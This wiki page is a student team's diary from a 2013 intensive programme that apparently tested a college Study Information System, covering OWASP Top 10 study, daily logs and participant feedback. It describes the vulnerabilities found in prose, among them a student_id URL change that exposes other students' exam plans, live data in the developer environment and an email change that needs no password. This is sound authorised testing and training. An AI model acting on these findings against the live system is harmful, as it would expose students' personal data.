* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
* &#039;&#039;&#039;What I did like: &#039;&#039;&#039;&lt;br /&gt;
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.&lt;br /&gt;
** Multicultural groups, where all the participants are from different countries.&lt;br /&gt;
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like: &#039;&#039;&lt;br /&gt;
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)&lt;br /&gt;
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
